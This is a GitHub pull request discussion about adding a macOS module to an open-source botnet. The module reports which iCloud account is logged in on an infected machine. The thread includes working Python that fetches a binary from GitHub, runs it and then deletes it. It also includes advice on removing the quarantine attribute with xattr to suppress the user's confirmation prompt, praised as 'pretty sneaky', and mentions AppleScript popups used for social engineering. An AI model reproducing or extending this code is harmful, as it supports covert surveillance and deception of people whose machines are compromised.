### PR TITLE
[MODULE] Check email for logged in iCloud account on macOS

### PR DESCRIPTION
**Pull request by danthegoodman1**

### CODE REVIEW

**Comment by malwaredllc** [comment]
Interesting module idea! Let me test it out on my MacBook real quick

**Comment by danthegoodman1** [comment]
> Interesting module idea! Let me test it out on my MacBook real quick

Yeah I've used it more as a function for making custom popups and such using applescript. It comes in handy for social engineering. The only reason I didn't post the applescript popups is now macOS Mojave asks the user permission if Terminal or iTerm is allowed to make the system ui calls when running the popup for the first time (which I assume most people would allow anyway).

**Comment by malwaredllc** [comment]
Ok so it wasn't working on my MacBook but I got it to work with these changes:

`#!/usr/bin/env python
# -*- coding: utf-8 -*-
'iCloud Account (Build Your Own Botnet)'

# standard library
import os
import urllib
import subprocess

# utilities
import util

# globals
packages = []
platforms = ['darwin']
command = True
usage = 'icloud'
description = """
Check for logged in iCloud accounts on macOS
"""

def run():
    """
    Check for logged in iCloud account on macOS

    """
    filename, _ = urllib.urlretrieve("https://github.com/mas-cli/mas/releases/download/v1.4.2/mas-cli.zip")
    util.unzip(filename)
    mas = os.path.join(os.path.dirname(filename), 'mas')
    result= subprocess.check_output([mas, "account"]).rstrip()
    util.delete(mas)
    return result
`

What do you think?

**Comment by danthegoodman1** [comment]
I'll put it in the PR and commit it if that's how you want it to exist. I had no problems running mine on my laptop or macOS virtual machines, interesting.

**Comment by malwaredllc** [comment]
So after a quick Google my understanding is that `xattr -r -d com.apple.quarantine /path/to/mas` command disables a potential user-confirmation requirement the first time a downloaded program is run, is that correct?

If so, that would indeed be useful to incorporate into the module.

Do you think a `os.chmod('/path/to/mas', 755)` need to be added to ensure the mas file is executable after extraction?

**Comment by danthegoodman1** [comment]
Yeah, that's why I had it in there before. It's pretty sneaky. I'll add in the chmod.

**Pull request merged**
